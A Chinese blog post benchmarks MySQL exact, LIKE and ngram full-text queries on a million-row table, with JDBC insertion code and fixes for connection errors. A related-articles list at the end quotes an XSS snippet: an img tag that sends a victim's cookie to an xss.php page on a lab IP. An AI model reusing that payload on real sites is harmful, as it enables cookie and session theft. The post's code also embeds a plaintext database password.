大家都对电商的商品查询并不陌生,比如我们想根据商品名称查询所有商品信息。

有些技术的童鞋第一念头是搜索引擎;有些技术的童鞋第一念头是模糊查询,如like?(如果商品信息存放到mysql里,我们一般使用like查询)

我们都知道,不同的场景决定了不同技术的使用场景也不同,那我们该如何选择呢?

那我们先做个实验吧(实验对象是mysql 8.0 community 版,windows10)

1.安装mysql 8.0 community 版本 https://dev.mysql.com/downloads/windows/installer/8.0.html

我使用的web版本 step by step

2.安装客户端SQLyog MySQ https://www.cr173.com/soft/22147.html

3 连接mysql  报错:

SQLyog连接报错 Error No.2058 Plugin caching_sha2_password could not be loaded

解决方法:windows 下cmd 登录 mysql -u root -p 登录你的 mysql 数据库,然后 执行这条SQL:

ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';

#password 是你自己设置的root密码
4.插入数据

依赖包:

        <dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>8.0.13</version>
</dependency>

程序

    public void mysqlOneByOneInsert() {
// JDBC 驱动名及数据库 URL
String JDBC_DRIVER = "com.mysql.cj.jdbc.Driver";
String DB_URL = "jdbc:mysql://localhost:3306/www?useUnicode=true&characterEncoding=utf8&serverTimezone=GMT%2B8&useSSL=false";//链接的mysql // 数据库的用户名与密码,需要根据自己的设置
String USER = "root";
String PASS = "wangwei456";
try {
long start=System.currentTimeMillis();
Class.forName(JDBC_DRIVER);
Connection connection = DriverManager.getConnection(DB_URL, USER, PASS);
PreparedStatement stmt = connection.prepareStatement("INSERT INTO PERSON(ID,NAME,AGE,ADDRESS,SALARY) values(?,?,?,?,?);"); for(int i=0;i<1000000;i++) {
stmt.setInt(1, i+1);
stmt.setString(2, "mkyong"+i);
stmt.setInt(3, i%100);
stmt.setString(4, "address"+i);
stmt.setFloat(5, 25000.00f);
stmt.executeUpdate();
}
stmt.close();
connection.close();
System.out.println("耗时:"+(System.currentTimeMillis()-start)+" 毫秒"); } catch (ClassNotFoundException e) {
e.printStackTrace(); } catch (SQLException e) {
e.printStackTrace();
} }

中间报错:

java.sql.SQLException: The server time zone value '???ú±ê×??±??' is unrecognized or represents more

解决方法:

在jdbc连接的url后面加上serverTimezone=GMT即可解决问题,如果需要使用gmt+8时区,需要写成GMT%2B8

感受:mysql输入插入速度(单条)简直是龟速呀 耗时:4390167 毫秒=4390秒=73分钟

1.精确查询 无索引

SELECT * FROM PERSON WHERE NAME='mkyong99999'

耗时:0.747秒

2.模糊查询 无索引

SELECT * FROM PERSON WHERE NAME LIKE 'mkyong99999%'

查询耗时:0.732秒

3.精确查询 有索引

SELECT * FROM PERSON WHERE NAME='mkyong99999'

耗时:0.01秒

4.模糊查询 有索引

FLUSH TABLES;
SELECT * FROM PERSON WHERE NAME LIKE 'mkyong99999%'

耗时:0.02秒

是不是很惊诧?看看执行计划

走的是索引。和很多人的常识是相反的。

5.无索引

SELECT * FROM PERSON WHERE ADDRESS='杭州大街100号99999'

耗时 0.911秒

6.无索引

FLUSH TABLES;
SELECT * FROM PERSON WHERE ADDRESS LIKE '杭州大街100号99999'

耗时0.775秒

7.有索引

FLUSH TABLES;
SELECT * FROM PERSON WHERE ADDRESS='杭州大街100号99999' SELECT * FROM PERSON WHERE ADDRESS LIKE '杭州大街100号99999'

都是0.01秒

8.针对有些字段比较长,使用模糊查询会慢的问题,mysql 从5.6后提供了全文检索功能,以5.8为例 <https://dev.mysql.com/doc/refman/8.0/en/fulltext-search.html>

ngram Full-Text Parser提供了分词的功能

创建全文索引

CREATE FULLTEXT INDEX add_index ON PERSON (ADDRESS) WITH PARSER ngram;

查询

SELECT * FROM PERSON WHERE MATCH (ADDRESS) AGAINST('杭州大街100号99999');

耗时:23秒

小结:

  1.like查询不一定不走索引,以实验验证为准

  2.商品量或者数据量比较小的情况下(通常100w以下),like查询并不慢。

  3.搜索引擎在千万,亿级别或者以上起到的作用才会比较明显,下篇会继续分析。

  4.mysql提供的全文索引的使用还是在掌握的情况下再使用,否则反而会影响系统性能

参考文献:

【1】https://blog.csdn.net/jared456/article/details/80380853

【2】https://blog.csdn.net/weixin_37577564/article/details/80329775

mysql真的不能做搜索引擎吗?的更多相关文章

  1. centos6.5环境通过shell脚本备份php的web及mysql数据库并做远程备份容灾

    centos6.5环境通过shell脚本备份php的web及mysql数据库并做远程备份容灾 系统:centos6.5 1.创建脚本目录 mkdir -p /usr/local/sh/ 创建备份web ...

  2. MySQL基于域名做高可用切换(Consul初试)

    一,Consul功能介绍 服务发现 - Consul的客户端可用提供一个服务,比如 api 或者mysql ,另外一些客户端可用使用Consul去发现一个指定服务的提供者.通过DNS或者HTTP应用程 ...

  3. Groonga开源搜索引擎——列存储做聚合,没有内建分布式,分片和副本是随mysql或者postgreSQL作为存储引擎由MySQL自身来做分片和副本的

    1. Characteristics of Groonga ppt:http://mroonga.org/publication/presentation/groonga-mysqluc2011.pd ...

  4. coreseek (sphinx)+ Mysql + Thinkphp搭建中文搜索引擎详解

      一, 前言    1,研究coreseek的动机 我有一个自己的笔记博客,经常在上面做一些技术文章分析.在查询一些文章的时候,以前只能将要查询的内容去mysql中用like模糊匹配.在文章多了的情 ...

  5. http+mysql结合keepalived做热备

    preface 公司要求http+mysql+redis+二次开发的ldap要求做高可用,所以此处写写keepalived在这种 环境下的高可用.keepalived这个软件我就不啰嗦了,众所周知,基 ...

  6. 通过读取excel数据和mysql数据库数据做对比(二)-代码编写测试

    通过上一步,环境已搭建好了. 下面开始实战, 首先,编写链接mysql的函数conn_sql.py import pymysql def sql_conn(u,pwd,h,db): conn=pymy ...

  7. mysql系列七、mysql索引优化、搜索引擎选择

    一.建立适当的索引 说起提高数据库性能,索引是最物美价廉的东西了.不用加内存,不用改程序,不用调sql,只要执行个正确的'create index',查询速度就可能提高百倍千倍,这可真有诱惑力.可是天 ...

  8. Java 使用 DBCP mysql 连接池 做数据库操作

    需要的jar包有 commons-dbutils , commons-dbcp , commons-pool , mysql-connector-java 本地database.propertties ...

  9. mysql优化不可不做的事情

    写在前面的话:总是在灾难发生后,才想起容灾的重要性:总是在吃过亏后,才记得有人提醒过 设计原则 1.不在数据库做运算:cpu计算务必移至业务层 2.控制单表数据量:单表记录控制在1000w 3.控制列 ...

随机推荐

  1. CSP里的xss

    无CSP保护下的xss 1.直接嵌入型 <img src="192.168.81.137:80/xss.php?a=[cookie]"> 过滤较少时,优先考虑.触发方式 ...

  2. 设计模式之桥接模式 c++11

    参考http://blog.csdn.net/calmreason/article/details/50909321 桥接模式 实现与抽象之间由指针关联 调用sample类 实际是调用sample类保 ...

  3. laravel控制器之资源控制器

    资源控制器 Laravel 的资源控制器可以让我们很便捷地构建基于资源的 RESTful 控制器,例如,你可能想要在应用中创建一个控制器,用于处理关于文章存储的 HTTP 请求,使用 Artisan ...

  4. Maven依赖及范围

    一.依赖范围(scope): 共5种,compile (编译).test (测试).runtime (运行时).provided.system compile:编译依赖范围,在编译,测试,运行时都需要 ...

  5. SIFT算法

     备注:源代码还未理解,所以未附上——下周任务 一.SIFT算法 1.算法简介 尺度不变特征转换即SIFT (Scale-invariant feature transform)是一种计算机视觉的算法 ...

  6. Linux 第八天

    4.源码包和rpm包的区别 1)区别 安装前:概念上的区别 安装后:安装位置不同 2)安装位置 rpm包安装位置 Rpm包默认安装路径 /etc/ 配置文件安装目录 /usr/bin/ 可执行的命令安 ...

  7. linux mysql 5.7.25 安裝

    1.下载 https://cdn.mysql.com//Downloads/MySQL-5.7/mysql-5.7.25-linux-glibc2.12-x86_64.tar.gz 2.解压 tar ...

  8. winSocket编程(十)完成端口

    //本篇为转贴 本系列里完成端口的代码在两年前就已经写好了,但是由于许久没有写东西了,不知该如何提笔,所以这篇文档总是在酝酿之中……酝酿了两年之后,终于决定开始动笔了,但愿还不算晚….. 这篇文档我非 ...

  9. Exception、Error、运行时异常与一般异常有何异同

    转自博客  https://blog.csdn.net/m0_37531231/article/details/79502778 一.开场白 对于程序运行过程中的可能出现异常情况,java语言使用一种 ...

  10. 剑指offer编程题Java实现——面试题14调整数组顺序使奇数位于偶数之前

    题目: 输入一个整数数组,实现一个函数来调整该数组中数组的顺序,使得所有的奇数位于数组的前半部分,偶数位于数组的后半部分. 解题思路:数组中维护两个指针,第一个指针初始化时候指向数组头部,第二个指针初 ...